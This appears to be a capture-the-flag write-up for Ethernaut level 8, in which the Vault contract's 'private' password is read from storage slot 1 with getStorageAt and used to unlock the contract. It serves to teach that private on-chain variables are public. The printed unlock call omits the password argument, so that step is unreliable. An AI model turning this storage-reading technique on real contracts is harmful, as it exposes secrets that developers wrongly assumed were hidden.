This is the level 8 of Ethernaut game.
Pre-requisites
- Layout of state variables in Solidity
- Reading storage at a slot in contract
Hack
Given contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Vault {
bool public locked;
bytes32 private password;
constructor(bytes32 _password) public {
locked = true;
password = _password;
}
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}
player has to set locked to false.
Only way is by calling unlock by correct password.
Although password state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private.
Above, the password is at a storage slot of 1 in Vault.
Let's read it:
password = await web3.eth.getStorageAt(contract.address, 1)
Call unlock with password:
await contract.unlock()
Unlocked. Verify by:
await contract.locked() === false
And that's it.
Learned something awesome? Consider starring the github repo 😄
and following me on twitter here 🙏
Top comments (0)